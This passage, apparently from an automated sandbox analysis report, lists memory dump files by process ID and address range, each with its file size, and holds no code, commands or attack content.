                                                                                                                                                                                                                        • memory/4040-173-0x0000000000FD0000-0x0000000000FDC000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                        • memory/4124-327-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          92KB

                                                                                                                                                                                                                        • memory/4176-332-0x0000000002330000-0x0000000002332000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/4228-333-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4248-338-0x0000000003144000-0x0000000003145000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4248-335-0x0000000003142000-0x0000000003144000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/4248-334-0x0000000003140000-0x0000000003142000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/4392-339-0x0000000002290000-0x0000000002291000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4392-341-0x0000000065EC0000-0x0000000067271000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          19.7MB

                                                                                                                                                                                                                        • memory/4392-340-0x0000000005880000-0x00000000058D1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          324KB